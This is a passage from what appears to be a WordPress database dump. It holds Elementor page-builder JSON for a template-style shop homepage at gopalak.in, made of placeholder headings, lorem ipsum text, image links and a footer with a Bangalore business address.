":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ae4d7ac\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1279df7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"61ee343\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1189e91\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#E2E4E28C\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#FF8236\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8678,1508,'_elementor_page_assets','a:0:{}'),(8680,1509,'_elementor_edit_mode','builder'),(8681,1509,'_elementor_template_type','wp-page'),(8682,1509,'_elementor_version','3.7.7'),(8683,1509,'_wp_page_template','elementor_canvas'),(8684,1509,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, 